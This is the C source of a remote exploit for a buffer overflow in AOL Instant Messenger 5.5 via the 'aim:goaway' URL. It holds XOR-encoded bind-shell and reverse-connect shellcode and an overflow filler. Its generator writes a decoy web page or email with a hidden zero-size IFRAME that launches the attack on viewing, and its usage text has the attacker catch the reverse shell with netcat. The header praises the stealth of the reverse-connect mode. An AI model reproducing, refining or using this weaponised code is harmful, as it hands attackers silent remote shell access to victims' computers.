
  1. /*
  2.  * AIM Away Message Buffer Overflow Remote Exploit
  3.  *   Exploit by John Bissell A.K.A. HighT1mes
  4.  *
  5.  * Exploit: 
  6.  * ========
  7.  *   aolInstantMessengerMessageBOExp.c v1.2 - fixes formatting issues...
  8.  *
  9.  * Vulnerable Software:
  10.  * ====================
  11.  *    - AIM 5.5.3588
  12.  *    - AIM 5.5.3590 Beta
  13.  *    - AIM 5.5.3591
  14.  *    - AIM 5.5.3595
  15.  *    and a couple others versions...
  16.  *
 * If you want to try other return addresses for other versions of
 * AIM, edit the return address. The one currently embedded is known
 * to work with all the AIM versions listed above.
  20.  *
 * I used some of the Metasploit shellcode for this exploit, with some
 * modifications to put it into stealth mode so the attack is harder to
 * detect. Since I'm using Metasploit shellcode, this exploit can be used
 * on any NT-type OS (Win2k, WinNT, WinXP) across any service pack -- I
 * don't know about SP2 though; I haven't tested it yet.
  27.  *
 * On a side note, I purposely did not include the download+exec shellcode
 * even though I have it, because I'm sick and tired of these little
 * spam/adware operators messing up people's computers for profit. You can
 * still download/upload through the shell to the victim; it just
 * isn't automated the way download+exec would be.
  33.  *
 * In my opinion the reverse connect (-r option) is the most dangerous,
 * because you can encode your IP address and pick a port, and then
 * when the victim visits the malicious web page or opens the e-mail, the
 * attack will automatically launch AIM even if it is not already running,
 * connect back to you, and then terminate the AIM process to stay stealthy,
 * so the victim doesn't know what hit them. As I remind people in the
 * exploit usage, you need to remember to use netcat to listen on the
 * port you picked so the exploit has something to connect to...
  42.  *
 * One reason I decided to include the generation of HTML code for
 * this exploit is that I noticed almost nobody puts a length limit on the
 * <IFRAME SRC=""> attribute. So when the victim loads that page or reads
 * that email, the browser or mail client hands the aim: URL in the
 * IFRAME to AIM (presumably via the registered aim: protocol handler)
 * and the exploit executes. IE 6.0 is affected by default and
 * Outlook Express 6 is affected when its security settings are set to
 * the Internet Zone.
  50.  *
  51.  * Excuse the sloppy commandline interface I just wanted to get
  52.  * this out to the public. 
  53.  *
  54.  * [ Original advisory posted by Secunia and iDEFENSE. ]
  55.  *
  56.  * Greets:
  57.  * =======
  58.  *   IsolationX, YpCat, DaPhire, route, #romhack,
  59.  *   Taylor Hayes, Aria Giovanni, Anthony Rocha,
 *   InVerse, Deltaflame, Jenna Jameson, iDEFENSE, 
  61.  *   secunia, so1o, John Kerry, Peter Winter-Smith,
  62.  *   and many others...
  63.  *
  64.  * Compiler: 
  65.  * =========
  66.  *    Visual C++ 6.0
  67.  *
 * To compile you first must add ws2_32.lib to the "Object/library modules:"
 * text box under the Project -> Settings menu (on the Link tab).
  70.  */
  71.  
  72. #include <stdio.h>
  73. #include <stdlib.h>
  74. #include <string.h>
  75. #include <windows.h>
  76.  
  77. /* Exploit Data */
  78.  
/*
 * Injection vector: the ASCII URL "aim:goaway?message=" (19 bytes)
 * followed by 1013 bytes of 0x41 ('A') filler -- 1032 bytes in total,
 * by count of this listing.  The filler is what overruns the away-message
 * buffer; main() appends the XOR-encoded shellcode directly after it, so
 * nothing in this array is patched at run time.  Kept as raw hex so the
 * byte count is unambiguous and not subject to editor reflow.
 */
char injection_vector[] =

    "\x61\x69\x6D\x3A\x67\x6F\x61\x77\x61\x79\x3F\x6D\x65\x73\x73\x61"
    "\x67\x65\x3D\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41";
  146.  
  147.  
  148.  
  149.  
/*
 * Bind-shell payload (407 bytes in this listing), XOR-encoded with the key
 * 0x92 (see xor_data); no byte of the literal is 0x00, which matters because
 * main() appends it to the URL with string functions.  After the short
 * prefix, the \xD9\xE1\xD9\x34\x24 \x58... \x80\x30\x92\x40\xE2\xFA run
 * appears to be a Metasploit-style fnstenv GetPC stub followed by a
 * `xor byte [eax],0x92 / inc eax / loop` decoder over the encoded body.
 * The \x92\x0f\x29\x12 near the start is presumably the overwritten return
 * address the header talks about (0x12290f92 little-endian) -- unverified.
 *
 * main() patches bytes 204..207 in place: 0x90, 0x92, then the listen
 * port's high and low bytes, each XOR-encoded.  A port byte equal to 0x92
 * encodes to 0x00 and would truncate the payload when it is appended.
 */
char bind_shellcode[] = 

    "\xEB\x26\x23\x38\x3B\x41\x41"
    "\x92\x0f\x29\x12\x41\x41\x41\x41\xD9\xE1\xD9\x34\x24\x58\x58\x58"
    "\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\x97\xFE\x80\x30\x92\x40\xE2"
    "\xFA\x7A\xAA\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB\x54\xEB\x77\xDB"
    "\x14\xDB\x36\x3F\xBC\x7B\x36\x88\xE2\x55\x4B\x9B\x67\x3F\x59\x7F"
    "\x6E\xA9\x1C\xDC\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C"
    "\x21\x84\xC5\xC1\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6"
    "\x1B\x77\x1B\xCF\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2"
    "\x8E\x3F\x19\xCA\x9A\x79\x9E\x1F\xC5\xBE\xC3\xC0\x6D\x42\x1B\x51"
    "\xCB\x79\x82\xF8\x9A\xCC\x93\x7C\xF8\x98\xCB\x19\xEF\x92\x12\x6B"
    "\x94\xE6\x76\xC3\xC1\x6D\xA6\x1D\x7A\x07\x92\x92\x92\xCB\x1B\x96"
    "\x1C\x70\x79\xA3\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92"
    "\x6D\xC7\xB2\xC5\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x8E\x1B\x51"
    "\xA3\x6D\xC5\xC5\xFA\x90\x92\xB0\x83\x1B\x74\xF8\x82\xC4\xC1\x6D"
    "\xC7\x8A\xC5\xC1\x6D\xC7\x86\xC5\xC4\xC1\x6D\xC7\x82\x1B\x50\xF4"
    "\x13\x7E\xC6\x92\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x1B\x45"
    "\x54\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xEE\xB6\xDA"
    "\x1B\xEE\xB6\xDE\x1B\xEE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3"
    "\xC3\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xA2\x1B\x73\x79"
    "\x9C\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xBE\xC5\x6D\xC7\x9E\x6D"
    "\xC7\xBA\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97"
    "\xEA\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6"
    "\x19\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F"
    "\x93\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4"
    "\x19\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3"
    "\x52\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
  178.  
  179.  
  180.  
/*
 * Reverse-connect payload (383 bytes in this listing), XOR-encoded with the
 * key 0x92 (see xor_data); no byte of the literal is 0x00.  It shares its
 * decoder stub with bind_shellcode (fnstenv GetPC, then a
 * `xor byte [eax],0x92 / inc eax / loop` pass over the encoded body) and
 * the same \x92\x0f\x29\x12 word near the start, presumably the return
 * address -- unverified.
 *
 * main() patches it in place before use:
 *   bytes 191..194  the four IPv4 octets of the listener, XOR-encoded
 *   bytes 196..199  0x90, 0x92, port high byte, port low byte (encoded)
 * An octet or port byte equal to 0x92 encodes to 0x00 and would truncate
 * the payload when it is appended to the URL as a C string.
 */
char reverse_shellcode[] =

    "\xEB\x08\x41\x41\x92\x0f\x29\x12\x41\x41\x41\x41\xD9\xE1\xD9\x34"
    "\x24\x58\x58\x58\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\xAC\xFE\x80"
    "\x30\x92\x40\xE2\xFA\x7A\xA2\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB"
    "\x54\xEB\x7E\x6B\x38\xF2\x4B\x9B\x67\x3F\x59\x7F\x6E\xA9\x1C\xDC"
    "\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C\x21\x84\xC5\xC1"
    "\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6\x1B\x77\x1B\xCF"
    "\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2\x8E\x3F\x19\xCA"
    "\x9A\x79\x9E\x1F\xC5\xB6\xC3\xC0\x6D\x42\x1B\x51\xCB\x79\x82\xF8"
    "\x9A\xCC\x93\x7C\xF8\x9A\xCB\x19\xEF\x92\x12\x6B\x96\xE6\x76\xC3"
    "\xC1\x6D\xA6\x1D\x7A\x1A\x92\x92\x92\xCB\x1B\x96\x1C\x70\x79\xA3"
    "\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92\x6D\xC7\x8A\xC5"
    "\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x86\x1B\x51\xA3\x6D\xFA\xDF"
    "\xDF\xDF\xDF\xFA\x90\x92\xB0\x83\x1B\x73\xF8\x82\xC3\xC1\x6D\xC7"
    "\x82\x17\x52\xE7\xDB\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x54"
    "\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xCE\xB6\xDA\x1B"
    "\xCE\xB6\xDE\x1B\xCE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3\xC3"
    "\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xBA\x1B\x73\x79\x9C"
    "\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xB6\xC5\x6D\xC7\x9E\x6D\xC7"
    "\xB2\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97\xEA"
    "\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6\x19"
    "\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F\x93"
    "\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4\x19"
    "\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3\x52"
    "\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
  207.  
  208. /* Function Prototypes */
  209.  
void print_usage(char *prog_name);          /* prints banner + usage to stdout, then exit(-1); never returns */
unsigned char xor_data(unsigned char byte); /* XOR one payload byte with the 0x92 key (self-inverse) */
  212.  
  213. /* Function Code */
  214.  
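/*
 * Parse a dotted-quad IPv4 address ("a.b.c.d") into four octets.
 *
 * Returns 0 on success with octets[0..3] filled in the order written;
 * returns -1 if text is NULL or is not exactly four decimal numbers in
 * 0..255 separated by dots (no sign, no whitespace, no trailing junk).
 */
static int parse_ipv4(const char *text, unsigned char octets[4])
{
    const char *cursor = text;
    int n;

    if (text == NULL) return -1;

    for (n = 0; n < 4; n++) {
        char *end;
        unsigned long value;

        /* strtoul() quietly accepts leading whitespace and a sign; refuse both. */
        if (*cursor < '0' || *cursor > '9') return -1;
        value = strtoul(cursor, &end, 10);
        if (end == cursor || value > 255) return -1;
        octets[n] = (unsigned char)value;

        if (n < 3) {
            if (*end != '.') return -1;
            cursor = end + 1;
        } else if (*end != '\0') {
            return -1;
        }
    }
    return 0;
}

/*
 * Parse a decimal TCP port in 1..65535.
 *
 * Returns 0 and stores the value on success; -1 for NULL, empty input,
 * trailing junk, a sign, or a value outside the port range.
 */
static int parse_port(const char *text, unsigned long *port)
{
    char *end;
    unsigned long value;

    if (text == NULL || *text < '0' || *text > '9') return -1;
    value = strtoul(text, &end, 10);
    if (end == text || *end != '\0' || value == 0 || value > 65535) return -1;
    *port = value;
    return 0;
}

/*
 * Write the listener port into an encoded shellcode buffer at offset off.
 *
 * Layout, unchanged from the original generator:
 *   sc[off]   = 0x90          sc[off+1] = 0x92
 *   sc[off+2] = enc(port>>8)  sc[off+3] = enc(port & 0xff)
 * i.e. the port in network (big-endian) byte order, XOR-encoded like the
 * rest of the payload.  The original derived these two bytes from
 * htonl(port) >> 16 / >> 24, which only yields this order on a
 * little-endian host (and it also did "+= 2" on htonl(port), which never
 * reached the bytes it extracted).  Taking the bytes explicitly makes the
 * output independent of host endianness and removes the only reason the
 * generator initialised Winsock.
 */
static void patch_port(char *sc, size_t off, unsigned long port)
{
    sc[off]     = (char)0x90;
    sc[off + 1] = (char)0x92;
    sc[off + 2] = (char)xor_data((unsigned char)((port >> 8) & 0xff));
    sc[off + 3] = (char)xor_data((unsigned char)(port & 0xff));
}

/*
 * Emit the HTML wrapper that carries the aim: URL in a hidden IFRAME.
 *
 * Returns 0 on success, -1 if the file could not be created or fully
 * written (write errors surface at ferror()/fclose() time).
 */
static int write_html(const char *path, const char *payload)
{
    FILE *fp = fopen(path, "w");
    int bad;

    if (fp == NULL) return -1;

    fprintf(fp, "<html>\n");
    fprintf(fp, "<head>\n");
    fprintf(fp, "<title>Hey d00d!</title>\n");
    fprintf(fp, "</head>\n");
    fprintf(fp, "<body>\n");
    fprintf(fp, "Some fake web page or email...\n");
    fprintf(fp, "<iframe width=0 height=0 border=0 src=\"");
    fprintf(fp, "%s", payload);
    fprintf(fp, "\">\n</iframe>\n");
    fprintf(fp, "</body>\n");
    fprintf(fp, "</html>\n");   /* the original emitted a second "<html>" here */

    /* fclose() flushes, so check it as well as the stream's error flag. */
    bad = ferror(fp);
    if (fclose(fp) != 0) bad = 1;
    return bad ? -1 : 0;
}

/*
 * Command-line driver: build the aim:goaway?message= URL (filler followed
 * by the patched, XOR-encoded shellcode) and either print it (-o) or wrap
 * it in an HTML file (-e outfile).
 *
 * Options: -r ip (reverse connect), -b (bind, default), -p port (default
 * 1337), -o, -e outfile.  Any option missing its argument, an unknown
 * option, a bad address/port, or the absence of both -o and -e prints the
 * usage text and exits via print_usage().
 *
 * Returns EXIT_SUCCESS, or EXIT_FAILURE when the payload cannot be built
 * or the output file cannot be written.
 */
int main(int argc, char *argv[])
{
    unsigned long port      = 1337; /* default port for bind and reverse attacks */
    int print_raw_exploit   = 0;    /* -o: bare URL on stdout, no HTML, no banner */
    int attack_mode         = 2;    /* 1 = reverse connect (-r), 2 = bind (-b, default) */
    const char *ip_text     = NULL; /* -r argument; parsed only in reverse mode */
    const char *outfile     = NULL; /* -e argument */
    char exploit[2048];
    char *shellcode;
    size_t vec_len, sc_len, sc_cap;
    int i;

    if (argc < 2) print_usage(argv[0]);

    /*
     * Process the command line.  Start at 1 so argv[0] is never read as an
     * option, and consume each option's argument so it is never re-read.
     * The original indexed argv[i+1] without checking i+1 < argc, which
     * dereferenced the NULL argv terminator for a trailing "-r"/"-p"/"-e".
     */
    for (i = 1; i < argc; i++) {
        if (argv[i][0] != '-' || argv[i][1] == '\0') {
            fprintf(stderr, "Error: unexpected argument '%s'\n", argv[i]);
            print_usage(argv[0]);
        }
        switch (argv[i][1]) {
        case 'r':
            /* reverse connect; the listener address is the next argument */
            if (i + 1 >= argc) {
                fprintf(stderr, "Error: -r needs an IP address\n");
                print_usage(argv[0]);
            }
            ip_text = argv[++i];
            attack_mode = 1;
            break;
        case 'b':
            /* bind */
            attack_mode = 2;
            break;
        case 'p':
            /* port, validated instead of trusting atoi() */
            if (i + 1 >= argc || parse_port(argv[i + 1], &port) != 0) {
                fprintf(stderr, "Error: -p needs a port in 1..65535\n");
                print_usage(argv[0]);
            }
            i++;
            break;
        case 'o':
            print_raw_exploit = 1;
            break;
        case 'e':
            if (i + 1 >= argc) {
                fprintf(stderr, "Error: -e needs an output path\n");
                print_usage(argv[0]);
            }
            outfile = argv[++i];
            break;
        default:
            fprintf(stderr, "Error: unknown option '%s'\n", argv[i]);
            print_usage(argv[0]);
        }
    }

    /* The original fopen()ed an uninitialised outfile buffer in this case. */
    if (!print_raw_exploit && outfile == NULL) {
        fprintf(stderr, "Error: specify -o or -e outfile\n");
        print_usage(argv[0]);
    }

    if (attack_mode == 1) {
        unsigned char octets[4];

        /* reverse connect attack: octets at 191..194, port block at 196..199 */
        if (parse_ipv4(ip_text, octets) != 0) {
            fprintf(stderr, "Error: -r needs a dotted IPv4 address (a.b.c.d)\n");
            return EXIT_FAILURE;
        }
        reverse_shellcode[191] = (char)xor_data(octets[0]);
        reverse_shellcode[192] = (char)xor_data(octets[1]);
        reverse_shellcode[193] = (char)xor_data(octets[2]);
        reverse_shellcode[194] = (char)xor_data(octets[3]);
        patch_port(reverse_shellcode, 196, port);
        shellcode = reverse_shellcode;
        sc_cap = sizeof(reverse_shellcode) - 1;
    } else {
        /* bind attack: port block at 204..207 */
        patch_port(bind_shellcode, 204, port);
        shellcode = bind_shellcode;
        sc_cap = sizeof(bind_shellcode) - 1;
    }

    /*
     * The payload travels as a C string and then as text inside an HTML
     * attribute.  xor_data() maps 0x92 to 0x00, so an IP octet or port byte
     * of 146 (0x92) turns into a NUL that silently truncates the shellcode
     * when it is appended -- the original strncat() did exactly that.
     * Detect it by comparing strlen() with the literal's declared size.
     * Other bytes that would break the carrier (e.g. 0x22, which closes the
     * src="..." attribute written by write_html) are not checked here.
     */
    sc_len = strlen(shellcode);
    if (sc_len != sc_cap) {
        fprintf(stderr, "Error: the chosen address/port encodes to a NUL byte "
                        "(octet or port byte 0x92); pick different values.\n");
        return EXIT_FAILURE;
    }

    /*
     * Build the exploit string: URL + filler, then the encoded shellcode.
     * memcpy with an explicit terminator replaces the original
     * strncpy(..., strlen()) / exploit[len+1] = 0 pair, which left
     * exploit[len] uninitialised and so could inject a stray byte between
     * the filler and the shellcode.
     */
    vec_len = strlen(injection_vector);
    if (vec_len + sc_len >= sizeof(exploit)) {
        fprintf(stderr, "Error: payload does not fit the exploit buffer\n");
        return EXIT_FAILURE;
    }
    memcpy(exploit, injection_vector, vec_len);
    memcpy(exploit + vec_len, shellcode, sc_len);
    exploit[vec_len + sc_len] = '\0';

    /* output exploit */
    if (print_raw_exploit) {
        printf("%s", exploit);
        return EXIT_SUCCESS;
    }

    if (write_html(outfile, exploit) != 0) {
        fprintf(stderr, "Error: Exploit file can't be created!\n");
        return EXIT_FAILURE;
    }

    printf(" +-------------------------------------------------+\n");
    printf(" |  AIM Exploit by John Bissell A.K.A. HighT1mes   |\n");
    printf(" |    AIM Away Message Buffer Overflow Exploit     |\n");
    printf(" +-------------------------------------------------+\n\n");

    printf(" Exploit created!\n\n");

    printf(" Remember if you use the -r option to have netcat listening\n");
    printf(" on the port you are using for the attack so the victim will\n");
    printf(" be able to connect to you when exploited...\n\n");
    printf(" Example:\n");
    /* %lu matches the unsigned long port (the original used %d: UB). */
    printf("\tnc.exe -l -p %lu\n", port);

    return EXIT_SUCCESS;
}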
  361.  
/*
 * Print the banner and usage text to stdout, then terminate the process
 * with exit status -1.  Never returns.
 *
 * prog_name: argv[0], echoed in the synopsis and example command lines.
 * Output is byte-for-byte what the original produced, including the
 * missing newline after the final "nc.exe" example.
 */
void print_usage(char *prog_name)
{
    static const char *const banner[] = {
        " +-------------------------------------------------+\n",
        " |  AIM Exploit by John Bissell A.K.A. HighT1mes   |\n",
        " |    AIM Away Message Buffer Overflow Exploit     |\n",
        " +-------------------------------------------------+\n\n",
    };
    size_t k;

    for (k = 0; k < sizeof(banner) / sizeof(banner[0]); k++)
        fputs(banner[k], stdout);

    fputs(" Exploit Usage:\n", stdout);
    printf("\t%s -r your_ip | -b [-p port] -o | -e outfile\n\n", prog_name);

    /* The option descriptions contain no conversions, so fputs() is exact. */
    fputs(" Parameters:\n", stdout);
    fputs("\t-r your_ip or -b\t Choose -r for reverse connect attack mode\n\t\t\t\tand choose -b for a bind attack. By default\n\t\t\t\t if you don't specify -r or -b then a bind\n\t\t\t\t attack will be generated.\n\n", stdout);
    fputs("\t-p (optional)\t\t This option will allow you to change the port \n\t\t\t\t used for a bind or reverse connect attack.\n\t\t\t\t If the attack mode is bind then  the\n\t\t\t\t victim will open the -p port. If the attack\n\t\t\t\t mode is reverse connect  then the port you\n\t\t\t\t specify will be the one you want to listen\n\t\t\t\t on so the victim can  connect to you\n\t\t\t\t right away.\n\n", stdout);
    fputs("\t-o or -e outfile\t\t Here you specify the output method...\n\t\t\t\t If you would like output go straight to\n\t\t\t\t standerd output then specify the -o option\n\t\t\t\t otherwise give the path of where you want to\n\t\t\t\t create the exploit file which is basically\n\t\t\t\t a simple html file. The -o option is useful if\n\t\t\t\t you want to test the exploit url in\n\t\t\t\t different ways.\n\n", stdout);

    fputs(" Examples:\n", stdout);
    printf("\t%s -r 68.6.47.62 -p 8888 -e c:\\exploit.html\n", prog_name);
    printf("\t%s -b -p 1542 -e c:\\new_exploit.html\n", prog_name);
    printf("\t%s -b -o\n", prog_name);
    printf("\t%s -r 68.6.47.62 -o\n\n", prog_name);

    fputs(" Remember if you use the -r option to have netcat listening\n"
          " on the port you are using for the attack so the victim will\n"
          " be able to connect to you when exploited...\n\n", stdout);
    fputs(" Example:\n", stdout);
    fputs("\tnc.exe -l -p 8888", stdout);

    exit(-1);
}
  386.  
/*
 * XOR one payload byte with the key 0x92 used by the shellcode decoder
 * stub.  The operation is its own inverse, so it both encodes and decodes.
 *
 * byte:    the plaintext (or encoded) byte
 * returns: byte ^ 0x92
 *
 * Note: an input of 0x92 yields 0x00, which a C string cannot carry; callers
 * that store the result into a NUL-terminated buffer must account for that.
 */
unsigned char xor_data(unsigned char byte)
{
    const unsigned char key = 0x92;
    unsigned char encoded = byte;

    encoded ^= key;
    return encoded;
}
  391.